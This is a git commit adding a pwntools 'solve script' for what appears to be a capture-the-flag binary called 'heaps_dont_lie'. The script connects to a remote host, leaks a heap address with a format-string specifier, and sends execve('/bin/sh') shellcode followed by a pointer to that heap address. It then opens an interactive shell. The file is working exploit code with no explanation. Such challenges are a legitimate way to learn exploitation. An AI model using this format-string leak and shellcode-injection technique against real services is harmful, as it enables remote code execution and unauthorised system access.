solve script

2024-11-18 19:51:05 +03:00
parent 6ad0bccc1a
commit 8709b54d81
1 changed files with 34 additions and 0 deletions
@@ -0,0 +1,34 @@
+#!/usr/bin/python3
+
+from pwn import *
+import time
+
+context.binary = target = ELF("./heaps_dont_lie", checksec=False)
+# r = process()
+r = remote("94.72.112.248", 1244)
+
+# funcs
+s = lambda a: r.sendline(a)
+ss = lambda a: r.send(a)
+
+# leak
+buf = b"%7$p"
+s(buf)
+r.recvuntil(b"tune : ")
+heap = int(r.recvline().strip(), 16) + 0x850
+log.info("heap: %#x", heap)
+
+# sc
+sc = """
+lea rdi, [rdx+19]
+xor rsi, rsi
+xor rdx, rdx
+mov rax, 59
+syscall
+"""
+sc = asm(sc) + b"/bin/sh\0"
+sc += b"A"*(32-len(sc))
+sc += p64(heap)
+s(sc)
+
+r.interactive()